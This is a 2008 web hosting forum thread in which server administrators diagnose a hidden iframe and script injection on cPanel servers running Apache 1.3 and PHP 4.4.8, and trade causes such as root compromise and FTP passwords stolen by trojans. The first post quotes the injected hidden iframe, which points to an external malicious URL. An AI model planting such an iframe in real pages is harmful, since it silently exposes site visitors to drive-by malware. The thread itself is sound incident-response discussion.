
04-19-2008, 07:38 PM
|
|
Web Hosting Evangelist
|
|
Join Date: Apr 2006
Posts: 464
|
|
Hello,
It seems that one domain at a cpanel server has been inyected with some iframe code... the problem seems to be that we can not find the iframe code anywhere in the public_html directory.
We already scanned the site public_html directory trying to find the js file or something that can launch the iframe but it seems to be impossible to find, also ran clamscanner in the fold without sucess.
I was thinking about some mod_security rule to block iframe js attacks, does anybody know about this?
This is a RHE 4 + cPanel server, any help is appreciated. This is the iframe code:
Code:
iframe width=1 height=1 src='http://x4iomu.wanna.somepills.in/images/enter.php?n2'
Thanks.
|

04-19-2008, 08:47 PM
|
|
Disabled
|
|
Join Date: Dec 2002
Location: chica go go
Posts: 11,858
|
|
Do you run mod_php or phpsuexec?
|

04-19-2008, 09:04 PM
|
|
Web Hosting Master
|
|
Join Date: Jan 2004
Location: Oztrayla Mate!
Posts: 572
|
|
Tell your customer to run comprehensive scans on their PC, and change their login details for FTP.
|

04-20-2008, 07:42 AM
|
|
Web Hosting Master
|
|
Join Date: Mar 2004
Posts: 680
|
|
I saw this on other server a few hours ago, customer files didn't get modified, and this also happened randomly even with a file with just a phpinfo() line on it. I'm afraid is deeped than a simple script injection
We should share some info about the affected servers, this had Apache 1.3 and PHP 4.4.8
|

04-20-2008, 10:51 AM
|
|
Web Hosting Evangelist
|
|
Join Date: Apr 2006
Posts: 464
|
|
Same here PHP 4.4.8 and Apache 1.3, we also tried to restore weekly backups and the problem stills 
|

04-20-2008, 12:18 PM
|
|
Web Hosting Master
|
|
Join Date: Mar 2004
Posts: 680
|
|
I have more info, in the phpinfo output, says the following
Quote:
<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
<body><script language='JavaScript' type='text/javascript' src='hhnkx.js'></script><div class="center">
|
It inserts a script tag after the boy tag, being this just a phpinfo seems to me that this is being inserted automatically by 'something' in the Apache webserver or the php
|

04-20-2008, 12:36 PM
|
|
Web Hosting Master
|
|
Join Date: Mar 2004
Posts: 680
|
|
Quote:
Originally Posted by sh4ka
Same here PHP 4.4.8 and Apache 1.3, we also tried to restore weekly backups and the problem stills 
|
You have a PM from me, btw, are we working on the same server?
Last edited by elmister; 04-20-2008 at 12:39 PM.
|

04-20-2008, 04:23 PM
|
|
Aspiring Evangelist
|
|
Join Date: Aug 2007
Location: Greece
Posts: 389
|
|
This could be one of the famous random scripts injections.If this is the case you are looking at a root comprmisation problem.
More info is available here
__________________
NOT a webhost!helping here just for the fun of it!
G(r)eek inside.
|

04-20-2008, 05:20 PM
|
|
Web Hosting Master
|
|
Join Date: Mar 2004
Posts: 680
|
|
Yes, that's exactly what happens on the box, it was also mentioned on cpanel.net website, according to that, servers were compromised, in this case root was probably achieved because it was using an old kernel that could be exploited
|

04-30-2008, 10:16 PM
|
|
Newbie
|
|
Join Date: Jun 2005
Location: California, USA
Posts: 10
|
|
|

04-30-2008, 10:30 PM
|
|
Aspiring Evangelist
|
|
Join Date: Oct 2005
Posts: 393
|
|
Quote:
Originally Posted by RodneyB
Is there a fix for this?
|
Yea, reinstall the OS.
|

05-01-2008, 02:18 AM
|
|
Premium Member
|
|
Join Date: Dec 2006
Location: London, UK
Posts: 1,256
|
|
Thats one heck of a fix 
|

05-13-2008, 07:52 PM
|
|
New Member
|
|
Join Date: May 2008
Location: Brazil
Posts: 1
|
|
Quote:
Originally Posted by jalapeno55
Yea, reinstall the OS.
|
If move to another server, will this be fixed? 
|

05-14-2008, 07:17 AM
|
|
Web Hosting Master
|
|
Join Date: Nov 2004
Location: Australia
Posts: 1,439
|
|
There's been discussion of this elsewhere; one of the most common entry vectors has been through passwords of ftp accounts. What happens is that your PC gets infected with a trojan which then sends them all your passwords. Simply resetting all your passwords isn't enough, you have to do a clean install on your PC as the trojans often aren't recognized by commercial anti-virus software, yet.
|

05-15-2008, 12:06 PM
|
|
Web Hosting Master
|
|
Join Date: Jan 2004
Location: Oztrayla Mate!
Posts: 572
|
|
Exactly as Brian the fellow Aussie said, every time i have encountered this problem it was due to an infected PC sending out the login details. To test this you can try changing your passwords on a different PC, chances are it wont happen again.
|
| Thread Tools |
Search this Thread |
|
|
|
| Display Modes |
Linear Mode
|
| Postbit Selector |
|
|
Posting Rules
|
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
HTML code is Off
|
|
|
|
|
|
| Login: |
|
|
| Advertisement: |
|
|
| Web Hosting News: |
|
|
|